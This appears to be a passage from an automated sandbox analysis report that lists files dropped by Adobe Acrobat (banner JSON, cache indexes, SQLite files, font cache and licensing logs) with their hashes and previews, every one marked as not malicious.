                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):292
                                                                                                Entropy (8bit):5.28139179384058
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXc7yZ+FIbRI6XVW7+0YqcDoAvJfQ1rPeUkwRe9:YvXKXcrYpW7ncsGY16Ukee9
                                                                                                MD5:6F9F99CEC6D5BC956D98CD8AE8E476B5
                                                                                                SHA1:B56AC057B60ECCCFAEB49E9DBA8347BACC83C2B6
                                                                                                SHA-256:7C3DBCDFB8D9CC4F3D62B575F12B203E2E16FA436C8157048FDBC04F1A34EC39
                                                                                                SHA-512:93B4EE11926C6E018EDE72AAF39C5EEFF942527B9C4C72DC9C2780F5B47CE44201B74C29604E56ABA76D88B074AEB064F4A7716105CB9E67AC71F757794127EE
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"d74bc4b7-aa09-4348-ba75-f46cf43d68fb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1736519848501,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):289
                                                                                                Entropy (8bit):5.299832343233317
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXc7yZ+FIbRI6XVW7+0YqcDoAvJfFldPeUkwRe9:YvXKXcrYpW7ncsGz8Ukee9
                                                                                                MD5:449AA653C7A123879155499EB4175336
                                                                                                SHA1:BE4008754EE61F94AB721769DFC6A29F7A43C263
                                                                                                SHA-256:BE13BD0782F62D943794AD652F03D229B14EDB2241AE1FB3CFCDA0236153B1F2
                                                                                                SHA-512:F8FB71EE7BDF39B71E57F768508F43DC3B8F683E6490BAFA38258A1CC53807DC36D957F35948A654E6BB8D8F7BD396473173FB682D4B774049695FF079BC9673
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"d74bc4b7-aa09-4348-ba75-f46cf43d68fb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1736519848501,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):295
                                                                                                Entropy (8bit):5.307224287763424
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXc7yZ+FIbRI6XVW7+0YqcDoAvJfzdPeUkwRe9:YvXKXcrYpW7ncsGb8Ukee9
                                                                                                MD5:D5C3E495271FF81D549671F9F04D15ED
                                                                                                SHA1:78E3E279366E5B821ED0F3DA83C50A2CF224D5E2
                                                                                                SHA-256:2BEAE715039498756F30858A4CA91D3A2747213E11114F78A3303E9245D7D067
                                                                                                SHA-512:0B8E19E055E33019B810E14CBB59A1EE0A914D457BFD482A33420DE6E180324A698D596977C7410370CFC8E42EEA751E66CB79C8BD2BD21CB95239EFAD90D0A5
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"d74bc4b7-aa09-4348-ba75-f46cf43d68fb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1736519848501,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):289
                                                                                                Entropy (8bit):5.287893480384274
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXc7yZ+FIbRI6XVW7+0YqcDoAvJfYdPeUkwRe9:YvXKXcrYpW7ncsGg8Ukee9
                                                                                                MD5:A59ED6FADBF1A2D314406FAD084BC671
                                                                                                SHA1:2B0FC97C224D8BECF2C3E7995C5DF574B611C2B8
                                                                                                SHA-256:8529399D03A2D7B20030CE585E1DF3BA7626A0558D7A22C13E9F69F63F1DD97A
                                                                                                SHA-512:02E66B98AA6317F2BE4DCD8A66A85ED06658D16DF2C8FBB5A0B251B254F9BB75704A0AE01E663CC87129CC3F450922AF962C4F776C50A805C172FEED36EC36B3
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"d74bc4b7-aa09-4348-ba75-f46cf43d68fb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1736519848501,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):284
                                                                                                Entropy (8bit):5.273413008723125
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXc7yZ+FIbRI6XVW7+0YqcDoAvJf+dPeUkwRe9:YvXKXcrYpW7ncsG28Ukee9
                                                                                                MD5:CFE9AC27EC1A454435588B9D39E6B480
                                                                                                SHA1:38D6748E5D5D3074B6126BBCF954B6C681925917
                                                                                                SHA-256:D193A273ADCEFCE017651A6787A39E6C1AA58E69A9548C46CB588EF2650D1C54
                                                                                                SHA-512:0DBB68C6F0EA9350DC1B3BD9AE223CC3788AB64C7A57B758A3A94D526C8320BF9826E022B9F1908B110DBA6D392171A46A69875D456263FA21E369C39B0409A0
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"d74bc4b7-aa09-4348-ba75-f46cf43d68fb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1736519848501,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):291
                                                                                                Entropy (8bit):5.2715237843785205
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXc7yZ+FIbRI6XVW7+0YqcDoAvJfbPtdPeUkwRe9:YvXKXcrYpW7ncsGDV8Ukee9
                                                                                                MD5:2F84972CB312D46C0EA1DA2A6FF5C2C7
                                                                                                SHA1:87EE7D618EB763C34092FB81471AEA4DFD50799F
                                                                                                SHA-256:EF3AE9D414EBCB67E02BD9085DCF63705FAEE32B51DBEDE1947258A63E8D4104
                                                                                                SHA-512:4F5F29CD6CEF12D2ECB1F19B4F54A6DD45D1175603519294DA83B8C3A8CD00566B4F4240BC0BBD8DB525E80715C348ABAA91C8E8CCD4D8F6C41F527B54E09DAE
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"d74bc4b7-aa09-4348-ba75-f46cf43d68fb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1736519848501,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):287
                                                                                                Entropy (8bit):5.273325296938075
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXc7yZ+FIbRI6XVW7+0YqcDoAvJf21rPeUkwRe9:YvXKXcrYpW7ncsG+16Ukee9
                                                                                                MD5:8D2D5E54D6435CA605DF9B1712D34C51
                                                                                                SHA1:90F2AD8D629F2EF724D94C680D204F03FD5A423A
                                                                                                SHA-256:8DABE86C1DE5A3F8E6212F9015A2B644693527789A40C56CFFCAA9984AC39A17
                                                                                                SHA-512:09FEC90546D3EB6D3EF002D0C5456547BCC70BB4BD5DC373A8DC5362F22C491029A10990C66F6A82A5D64D484F736E55F6AA2946FE60C237CB513A3C224CCB92
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"d74bc4b7-aa09-4348-ba75-f46cf43d68fb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1736519848501,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):1090
                                                                                                Entropy (8bit):5.661357857049248
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Yv6Xcwinc5amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSY:Yv/cFBgkDMUJUAh8cvMY
                                                                                                MD5:D887F088D2248C109BD5E5D3BEAC401B
                                                                                                SHA1:26E9324ACE0C257EA91EEFF4FAE693D7AA65B299
                                                                                                SHA-256:F815453099C70B80E519BE56D8CAE78E2DBD8194651DEFF045952A3853820791
                                                                                                SHA-512:986D01FBA41E8103D35E4051C6BA2652434CAB8EB9628743B20E2C40C86645C54C9ABC8C5558AB325F6A0FBBACC8B83ED98A60B471D62BCD4D39BE0295E187FE
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"d74bc4b7-aa09-4348-ba75-f46cf43d68fb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1736519848501,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):286
                                                                                                Entropy (8bit):5.24698964504759
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXc7yZ+FIbRI6XVW7+0YqcDoAvJfshHHrPeUkwRe9:YvXKXcrYpW7ncsGUUUkee9
                                                                                                MD5:FAAA73FE1E2EF829028EDAC4777497DD
                                                                                                SHA1:96CDD35E65F344E4921C033A66370EE9A618D297
                                                                                                SHA-256:ACBF24943FD3BFE56045018FF33BC46387BA06E73C1893CB0F27C2622F3BB4DB
                                                                                                SHA-512:7FFE12F441CA474FCB932B4AB90236749A54192A22AE3BE341B4453182164AB8CD511A0CE604FED1289381DFA9EBEDFE4D220D0829F2888A8C0746129B9E74D5
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"d74bc4b7-aa09-4348-ba75-f46cf43d68fb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1736519848501,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):282
                                                                                                Entropy (8bit):5.263086731387455
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXc7yZ+FIbRI6XVW7+0YqcDoAvJTqgFCrPeUkwRe9:YvXKXcrYpW7ncsGTq16Ukee9
                                                                                                MD5:1CD6FF43A39ABE603DA6103084BC6935
                                                                                                SHA1:2D99CEE435FA47C2F229C3EEBB38E9368CBF0B7F
                                                                                                SHA-256:B5EE50F6D21CCA1FF304A8D24163FF74F1354C30B44D3A7FE9629468B91EC14B
                                                                                                SHA-512:1AA76D1C4EDD8C7949BC9F001BD5B94398426A38585F5655A013004EC8F09498074C68B16B7396979FCBD7336500ED656F04614CB3DCB2346D8C9B3B3FAF98DD
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"d74bc4b7-aa09-4348-ba75-f46cf43d68fb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1736519848501,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4
                                                                                                Entropy (8bit):0.8112781244591328
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:e:e
                                                                                                MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                Malicious:false
                                                                                                Preview:....
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):2814
                                                                                                Entropy (8bit):5.136217644758662
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:YkFyirEDGijQpI4ibJHvkcMGp6R8D9/wa:FyiY5jQO4yMcMGp3xJ
                                                                                                MD5:B7F62D4678A53639C7FC8A4BAF536353
                                                                                                SHA1:F80A223A96248D4DFDDB2FAB2600F3CF3CFBB1BA
                                                                                                SHA-256:BDDBA46BF8D5665D113B59F83775DECEAA2D65E99C5513AD4C1A05A51D7B0867
                                                                                                SHA-512:B9C43A9BC8A962A9C0E51E27D36A5D3F4D69C7007BF81668B2E2AA9EAD207C091001286B0449E2E16396D3D975E2EC86A2EB31D480D45529E527C61D1D624EBC
                                                                                                Malicious:false
                                                                                                Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"bf51a28131c3de21ccc08ac6b343f64f","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736344093000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"74d33d5962d3b9577b473dc2fefc1013","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736344093000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"5e995a6829946d89bd4e5422edebaaed","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736344093000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"080c3c9da28dc8eab467a0520c8ff4cb","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736344093000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"0725a9d8842a6418d2c4d187a607ed88","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736344093000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"75686a433cf68d850ec304ab2dbcf201","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                                                Category:dropped
                                                                                                Size (bytes):12288
                                                                                                Entropy (8bit):0.98451845135634
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/SpEOM0L4zJwtNBwtNbRZ6bRZ4NOM0LF:TVl2GL7ms6ggOVpG0kzutYtp6Po0h
                                                                                                MD5:2ABD5BB536DD104443A84061D161929F
                                                                                                SHA1:28FD5AFEFE81F7280AC8D69F76101ABF8880FB1A
                                                                                                SHA-256:6D4FABBC2DEF12D4310F5132FF7CBFE5F54573ECA91C6AFB41FDDAB020008EBC
                                                                                                SHA-512:FCFDA13945D63CE91C4A173DBF8F8498621D0064D5BE0220D8AF6D24BC55D264830E5FEB546A20B8594DFE03EB9A21A1885E6040C49D8F28EE51D6B9504D111D
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:SQLite Rollback Journal
                                                                                                Category:dropped
                                                                                                Size (bytes):8720
                                                                                                Entropy (8bit):1.3377942451105442
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:7+tJAD1RZKHs/Ds/SpEOM0LPzJwtNBwtNbRZ6bRZWf1RZKzqLBx/XYKQvGJF7urw:7MJGgOVpG0bzutYtp6PM2qll2GL7ms1
                                                                                                MD5:DD34B95DE36669E9F53713F4F2567C18
                                                                                                SHA1:01A45EC7F10789810A7BBF7F23E6992889F89D40
                                                                                                SHA-256:7015AA551535A6B9D6E0B8AB291BFBA7F8B1BFA340566A3CD9B28BE9B7302A94
                                                                                                SHA-512:E5317171B7C69325EE8AC2563183F00685183C29DA2BC42526367B81A156F2B4A9915019493B0FDCA96A8168D4FDBEB0CE9C66131D6C7A120C0475074FEE0B23
                                                                                                Malicious:false
                                                                                                Preview:.... .c.....g.h.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):66726
                                                                                                Entropy (8bit):5.392739213842091
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:RNOpblrU6TBH44ADKZEgLbDc7/kjusvVyxtCztVZYSRj2NzNuYyu:6a6TZ44ADELbw7/knvVYt82N0K
                                                                                                MD5:C7DC95AED0335B5C471C96384F8CF770
                                                                                                SHA1:7DC59EF1A85C00EF5E836998EE837C1CB5E123A1
                                                                                                SHA-256:911E79A80FCC362214C13CBC19DF4E9C0916728EFDD6BA2DA1B6D0C8B620B4EE
                                                                                                SHA-512:12EDF332042AD40138991349BCDADC027E81FC6748356EC8DB2D73F445894BCF162272559989046FB7ADAE5AF801BEA612C2B4729A6805442DFA0793536903A6
                                                                                                Malicious:false
                                                                                                Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):246
                                                                                                Entropy (8bit):3.5146815864506182
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8esQClgXH:Qw946cPbiOxDlbYnuRK9NH
                                                                                                MD5:E626884073AAD192B0FA0BD495542472
                                                                                                SHA1:5B89516E06FCC60E63A2CDCADD0CF8D7B2FC7DF9
                                                                                                SHA-256:62C0362D8038B3F1EAB7E121DC7AEF9E21D573F34A1A330DF46A5B308153D982
                                                                                                SHA-512:6FEAFE614D020D946EAE7F9649293FA2C9400F69DFBC3E594A71B0F7DE31A1166710BDDC55AD1C1CFF5FA3C88D8D3A63CDF54D48402B4379DA8AF4A6F046C704
                                                                                                Malicious:false
                                                                                                Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.8./.0.1./.2.0.2.5. . .0.8.:.4.8.:.1.2. .=.=.=.....
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:ASCII text, with very long lines (393)
                                                                                                Category:dropped
                                                                                                Size (bytes):16525
                                                                                                Entropy (8bit):5.376360055978702
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                                                                                                MD5:1336667A75083BF81E2632FABAA88B67
                                                                                                SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                                                                                                SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                                                                                                SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                                                                                                Malicious:false
                                                                                                Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):15114
                                                                                                Entropy (8bit):5.359599665906217
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:a46VyMzTcbCRqIFHCNVh136HjUxXYk4wOZFzx1D7VkVFBdv25y05sek1VAhnBuNg:2HjOK
                                                                                                MD5:A51C4EFD938C423CF7444A96337F422F
                                                                                                SHA1:1AC18CDE4D72E44BB8CE830F3D6F2CF78D29DD6E
                                                                                                SHA-256:611FE86D619B695B682311F126C5E650E3D668BB1863E8FF0A6BEF4194B94123
                                                                                                SHA-512:C4F6A33418F3066F17252D1555E77DADE688A1795340188CC087CE0EBCE3CB9BD510B9D7FA3B585A8B3DE20F9AD7C5A2A41F2DE925F9E65DB81A1A7C152F0170
                                                                                                Malicious:false
                                                                                                Preview:SessionID=25f49e04-b2f0-4649-947d-538dfb2a292d.1736344085853 Timestamp=2025-01-08T08:48:05:853-0500 ThreadID=1476 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=25f49e04-b2f0-4649-947d-538dfb2a292d.1736344085853 Timestamp=2025-01-08T08:48:05:854-0500 ThreadID=1476 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=25f49e04-b2f0-4649-947d-538dfb2a292d.1736344085853 Timestamp=2025-01-08T08:48:05:854-0500 ThreadID=1476 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=25f49e04-b2f0-4649-947d-538dfb2a292d.1736344085853 Timestamp=2025-01-08T08:48:05:854-0500 ThreadID=1476 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=25f49e04-b2f0-4649-947d-538dfb2a292d.1736344085853 Timestamp=2025-01-08T08:48:05:854-0500 ThreadID=1476 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):29752
                                                                                                Entropy (8bit):5.396526018891502
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbI:s
                                                                                                MD5:8EA92040B13F10A455B43E636588ED24
                                                                                                SHA1:0AFA5AD0D4780C27EE3C9C74004DBF1EEC38FBE2
                                                                                                SHA-256:F4E2B1EC1D731729538E866F676ADB7073E153B90FDC0485F3DC5E63FEED9347
                                                                                                SHA-512:4488EC1BF4B5F5DD6335892514B420165986CEE17D69D7B715B4B16952F4EC1C9A82C447E24776B853DD96B7E607FFA6475CB13C169E342B985713A5E35CB622
                                                                                                Malicious:false
                                                                                                Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                                Category:dropped
                                                                                                Size (bytes):1419751
                                                                                                Entropy (8bit):7.976496077007677
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru
                                                                                                MD5:95F182500FC92778102336D2D5AADCC8
                                                                                                SHA1:BEC510B6B3D595833AF46B04C5843B95D2A0A6C9
                                                                                                SHA-256:9F9C041D7EE1DA404E53022D475B9E6D5924A17C08D5FDEC58C0A1DCDCC4D4C9
                                                                                                SHA-512:D7C022459486D124CC6CDACEAD8D46E16EDC472F4780A27C29D98B35AD01A9BA95F62155433264CC12C32BFF384C7ECAFCE0AC45853326CBC622AE65EE0D90BA
                                                                                                Malicious:false
